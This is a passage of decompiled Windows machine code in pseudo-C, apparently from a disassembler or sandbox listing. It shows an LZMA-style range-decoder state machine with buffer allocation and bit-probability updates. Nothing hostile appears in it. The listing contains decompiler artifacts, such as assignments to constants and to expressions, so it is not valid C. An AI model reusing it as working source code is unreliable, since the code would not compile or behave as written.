                                                          											if( *(_t613 - 0x48) < 4) {
                                                          												goto L13;
                                                          											}
                                                          											_t546 =  *(_t613 - 0x40);
                                                          											if(_t546 ==  *(_t613 - 0x74)) {
                                                          												L20:
                                                          												 *(_t613 - 0x48) = 5;
                                                          												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          												goto L23;
                                                          											}
                                                          											 *(_t613 - 0x74) = _t546;
                                                          											if( *(_t613 - 8) != 0) {
                                                          												GlobalFree( *(_t613 - 8));
                                                          											}
                                                          											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          											 *(_t613 - 8) = _t534;
                                                          											if(_t534 == 0) {
                                                          												goto L171;
                                                          											} else {
                                                          												goto L20;
                                                          											}
                                                          										case 2:
                                                          											L24:
                                                          											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          											 *(_t613 - 0x84) = 6;
                                                          											 *(_t613 - 0x4c) = _t553;
                                                          											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                          											 *(_t613 - 0x54) = _t606;
                                                          											goto L133;
                                                          										case 3:
                                                          											L21:
                                                          											__eflags =  *(_t613 - 0x6c);
                                                          											if( *(_t613 - 0x6c) == 0) {
                                                          												 *(_t613 - 0x88) = 3;
                                                          												goto L170;
                                                          											}
                                                          											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          											_t67 = _t613 - 0x70;
                                                          											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          											__eflags =  *_t67;
                                                          											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          											L23:
                                                          											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          											if( *(_t613 - 0x48) != 0) {
                                                          												goto L21;
                                                          											}
                                                          											goto L24;
                                                          										case 4:
                                                          											L133:
                                                          											_t531 =  *_t606;
                                                          											_t589 = _t531 & 0x0000ffff;
                                                          											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          											if( *(_t613 - 0xc) >= _t565) {
                                                          												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          												 *(_t613 - 0x40) = 1;
                                                          												_t532 = _t531 - (_t531 >> 5);
                                                          												 *_t606 = _t532;
                                                          											} else {
                                                          												 *(_t613 - 0x10) = _t565;
                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          											}
                                                          											if( *(_t613 - 0x10) >= 0x1000000) {
                                                          												goto L139;
                                                          											}
                                                          										case 5:
                                                          											goto L137;
                                                          										case 6:
                                                          											__edx = 0;
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x34) = 1;
                                                          												 *(__ebp - 0x84) = 7;
                                                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          											__esi =  *(__ebp - 0x60);
                                                          											__cl = 8;
                                                          											__cl = 8 -  *(__ebp - 0x3c);
                                                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          											__ecx =  *(__ebp - 0x3c);
                                                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          											__ecx =  *(__ebp - 4);
                                                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          											__eflags =  *(__ebp - 0x38) - 4;
                                                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          											if( *(__ebp - 0x38) >= 4) {
                                                          												__eflags =  *(__ebp - 0x38) - 0xa;
                                                          												if( *(__ebp - 0x38) >= 0xa) {
                                                          													_t98 = __ebp - 0x38;
                                                          													 *_t98 =  *(__ebp - 0x38) - 6;
                                                          													__eflags =  *_t98;
                                                          												} else {
                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          												}
                                                          											} else {
                                                          												 *(__ebp - 0x38) = 0;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x34) - __edx;
                                                          											if( *(__ebp - 0x34) == __edx) {
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												goto L61;
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__ecx =  *(__ebp - 8);
                                                          												__ebx = 0;
                                                          												__ebx = 1;
                                                          												__al =  *((intOrPtr*)(__eax + __ecx));
                                                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          												goto L41;
                                                          											}
                                                          										case 7:
                                                          											__eflags =  *(__ebp - 0x40) - 1;
                                                          											if( *(__ebp - 0x40) != 1) {
                                                          												__eax =  *(__ebp - 0x24);
                                                          												 *(__ebp - 0x80) = 0x16;
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xa;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          												__eax =  *(__ebp - 4);
                                                          												__eax =  *(__ebp - 4) + 0x664;
                                                          												__eflags = __eax;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L69;
                                                          											}
                                                          											__eax =  *(__ebp - 4);
                                                          											__ecx =  *(__ebp - 0x38);
                                                          											 *(__ebp - 0x84) = 8;
                                                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          											while(1) {
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											}
                                                          										case 8:
                                                          											goto L0;
                                                          										case 9:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												goto L89;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x60);
                                                          											if( *(__ebp - 0x60) == 0) {
                                                          												goto L171;
                                                          											}
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                          											__eflags = _t258;
                                                          											0 | _t258 = _t258 + _t258 + 9;
                                                          											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                          											goto L75;
                                                          										case 0xa:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 0xb;
                                                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x28);
                                                          											goto L88;
                                                          										case 0xb:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__ecx =  *(__ebp - 0x24);
                                                          												__eax =  *(__ebp - 0x20);
                                                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          											} else {
                                                          												__eax =  *(__ebp - 0x24);
                                                          											}
                                                          											__ecx =  *(__ebp - 0x28);
                                                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          											L88:
                                                          											__ecx =  *(__ebp - 0x2c);
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          											L89:
                                                          											__eax =  *(__ebp - 4);
                                                          											 *(__ebp - 0x80) = 0x15;
                                                          											__eax =  *(__ebp - 4) + 0xa68;
                                                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          											goto L69;
                                                          										case 0xc:
                                                          											L99:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xc;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t334 = __ebp - 0x70;
                                                          											 *_t334 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t334;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											__eax =  *(__ebp - 0x2c);
                                                          											goto L101;
                                                          										case 0xd:
                                                          											L37:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xd;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t122 = __ebp - 0x70;
                                                          											 *_t122 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t122;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L39:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          												goto L48;
                                                          											}
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												goto L54;
                                                          											}
                                                          											L41:
                                                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          											 *(__ebp - 0x48) = __eax;
                                                          											__eax = __eax + 1;
                                                          											__eax = __eax << 8;
                                                          											__eax = __eax + __ebx;
                                                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edx = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												 *(__ebp - 0x40) = 1;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												__ebx = __ebx + __ebx + 1;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edx;
                                                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L39;
                                                          											} else {
                                                          												goto L37;
                                                          											}
                                                          										case 0xe:
                                                          											L46:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xe;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t156 = __ebp - 0x70;
                                                          											 *_t156 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t156;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											while(1) {
                                                          												L48:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t170 = __edx + 1; // 0x1
                                                          													__ebx = _t170;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													continue;
                                                          												} else {
                                                          													goto L46;
                                                          												}
                                                          											}
                                                          											L54:
                                                          											_t173 = __ebp - 0x34;
                                                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          											__eflags =  *_t173;
                                                          											goto L55;
                                                          										case 0xf:
                                                          											L58:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0xf;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t203 = __ebp - 0x70;
                                                          											 *_t203 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t203;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L60:
                                                          											__eflags = __ebx - 0x100;
                                                          											if(__ebx >= 0x100) {
                                                          												L55:
                                                          												__al =  *(__ebp - 0x44);
                                                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          												goto L56;
                                                          											}
                                                          											L61:
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__edx = __ebx + __ebx;
                                                          											__ecx =  *(__ebp - 0x10);
                                                          											__esi = __edx + __eax;
                                                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          											__ax =  *__esi;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												_t217 = __edx + 1; // 0x1
                                                          												__ebx = _t217;
                                                          												__cx = __ax >> 5;
                                                          												__eflags = __eax;
                                                          												 *__esi = __ax;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												__ebx = __ebx + __ebx;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											 *(__ebp - 0x44) = __ebx;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L60;
                                                          											} else {
                                                          												goto L58;
                                                          											}
                                                          										case 0x10:
                                                          											L109:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x10;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t365 = __ebp - 0x70;
                                                          											 *_t365 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t365;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											goto L111;
                                                          										case 0x11:
                                                          											L69:
                                                          											__esi =  *(__ebp - 0x58);
                                                          											 *(__ebp - 0x84) = 0x12;
                                                          											while(1) {
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											}
                                                          										case 0x12:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												__eax =  *(__ebp - 0x58);
                                                          												 *(__ebp - 0x84) = 0x13;
                                                          												__esi =  *(__ebp - 0x58) + 2;
                                                          												while(1) {
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											__eflags = __eax;
                                                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          											goto L130;
                                                          										case 0x13:
                                                          											__eflags =  *(__ebp - 0x40);
                                                          											if( *(__ebp - 0x40) != 0) {
                                                          												_t469 = __ebp - 0x58;
                                                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          												__eflags =  *_t469;
                                                          												 *(__ebp - 0x30) = 0x10;
                                                          												 *(__ebp - 0x40) = 8;
                                                          												L144:
                                                          												 *(__ebp - 0x7c) = 0x14;
                                                          												goto L145;
                                                          											}
                                                          											__eax =  *(__ebp - 0x4c);
                                                          											__ecx =  *(__ebp - 0x58);
                                                          											__eax =  *(__ebp - 0x4c) << 4;
                                                          											 *(__ebp - 0x30) = 8;
                                                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          											L130:
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											 *(__ebp - 0x40) = 3;
                                                          											goto L144;
                                                          										case 0x14:
                                                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          											__eax =  *(__ebp - 0x80);
                                                          											 *(_t613 - 0x88) = _t533;
                                                          											goto L1;
                                                          										case 0x15:
                                                          											__eax = 0;
                                                          											__eflags =  *(__ebp - 0x38) - 7;
                                                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          											__al = __al & 0x000000fd;
                                                          											__eax = (__eflags >= 0) - 1 + 0xb;
                                                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          											goto L120;
                                                          										case 0x16:
                                                          											__eax =  *(__ebp - 0x30);
                                                          											__eflags = __eax - 4;
                                                          											if(__eax >= 4) {
                                                          												_push(3);
                                                          												_pop(__eax);
                                                          											}
                                                          											__ecx =  *(__ebp - 4);
                                                          											 *(__ebp - 0x40) = 6;
                                                          											__eax = __eax << 7;
                                                          											 *(__ebp - 0x7c) = 0x19;
                                                          											 *(__ebp - 0x58) = __eax;
                                                          											goto L145;
                                                          										case 0x17:
                                                          											L145:
                                                          											__eax =  *(__ebp - 0x40);
                                                          											 *(__ebp - 0x50) = 1;
                                                          											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          											goto L149;
                                                          										case 0x18:
                                                          											L146:
                                                          											__eflags =  *(__ebp - 0x6c);
                                                          											if( *(__ebp - 0x6c) == 0) {
                                                          												 *(__ebp - 0x88) = 0x18;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x70);
                                                          											__eax =  *(__ebp - 0xc);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											_t484 = __ebp - 0x70;
                                                          											 *_t484 =  *(__ebp - 0x70) + 1;
                                                          											__eflags =  *_t484;
                                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          											L148:
                                                          											_t487 = __ebp - 0x48;
                                                          											 *_t487 =  *(__ebp - 0x48) - 1;
                                                          											__eflags =  *_t487;
                                                          											L149:
                                                          											__eflags =  *(__ebp - 0x48);
                                                          											if( *(__ebp - 0x48) <= 0) {
                                                          												__ecx =  *(__ebp - 0x40);
                                                          												__ebx =  *(__ebp - 0x50);
                                                          												0 = 1;
                                                          												__eax = 1 << __cl;
                                                          												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          												__eax =  *(__ebp - 0x7c);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												while(1) {
                                                          													 *(_t613 - 0x88) = _t533;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											__eax =  *(__ebp - 0x50);
                                                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          											__eax =  *(__ebp - 0x58);
                                                          											__esi = __edx + __eax;
                                                          											 *(__ebp - 0x54) = __esi;
                                                          											__ax =  *__esi;
                                                          											__edi = __ax & 0x0000ffff;
                                                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          											__eflags =  *(__ebp - 0xc) - __ecx;
                                                          											if( *(__ebp - 0xc) >= __ecx) {
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          												__cx = __ax;
                                                          												__cx = __ax >> 5;
                                                          												__eax = __eax - __ecx;
                                                          												__edx = __edx + 1;
                                                          												__eflags = __edx;
                                                          												 *__esi = __ax;
                                                          												 *(__ebp - 0x50) = __edx;
                                                          											} else {
                                                          												 *(__ebp - 0x10) = __ecx;
                                                          												0x800 = 0x800 - __edi;
                                                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          												 *__esi = __cx;
                                                          											}
                                                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          											if( *(__ebp - 0x10) >= 0x1000000) {
                                                          												goto L148;
                                                          											} else {
                                                          												goto L146;
                                                          											}
                                                          										case 0x19:
                                                          											__eflags = __ebx - 4;
                                                          											if(__ebx < 4) {
                                                          												 *(__ebp - 0x2c) = __ebx;
                                                          												L119:
                                                          												_t393 = __ebp - 0x2c;
                                                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          												__eflags =  *_t393;
                                                          												L120:
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												__eflags = __eax;
                                                          												if(__eax == 0) {
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          													goto L170;
                                                          												}
                                                          												__eflags = __eax -  *(__ebp - 0x60);
                                                          												if(__eax >  *(__ebp - 0x60)) {
                                                          													goto L171;
                                                          												}
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          												__eax =  *(__ebp - 0x30);
                                                          												_t400 = __ebp - 0x60;
                                                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          												__eflags =  *_t400;
                                                          												goto L123;
                                                          											}
                                                          											__ecx = __ebx;
                                                          											__eax = __ebx;
                                                          											__ecx = __ebx >> 1;
                                                          											__eax = __ebx & 0x00000001;
                                                          											__ecx = (__ebx >> 1) - 1;
                                                          											__al = __al | 0x00000002;
                                                          											__eax = (__ebx & 0x00000001) << __cl;
                                                          											__eflags = __ebx - 0xe;
                                                          											 *(__ebp - 0x2c) = __eax;
                                                          											if(__ebx >= 0xe) {
                                                          												__ebx = 0;
                                                          												 *(__ebp - 0x48) = __ecx;
                                                          												L102:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__eax = __eax + __ebx;
                                                          													 *(__ebp - 0x40) = 4;
                                                          													 *(__ebp - 0x2c) = __eax;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x644;
                                                          													__eflags = __eax;
                                                          													L108:
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													 *(__ebp - 0x50) = 1;
                                                          													 *(__ebp - 0x44) = 0;
                                                          													 *(__ebp - 0x48) = 0;
                                                          													L112:
                                                          													__eax =  *(__ebp - 0x40);
                                                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          														_t391 = __ebp - 0x2c;
                                                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          														__eflags =  *_t391;
                                                          														goto L119;
                                                          													}
                                                          													__eax =  *(__ebp - 0x50);
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__esi = __edi + __eax;
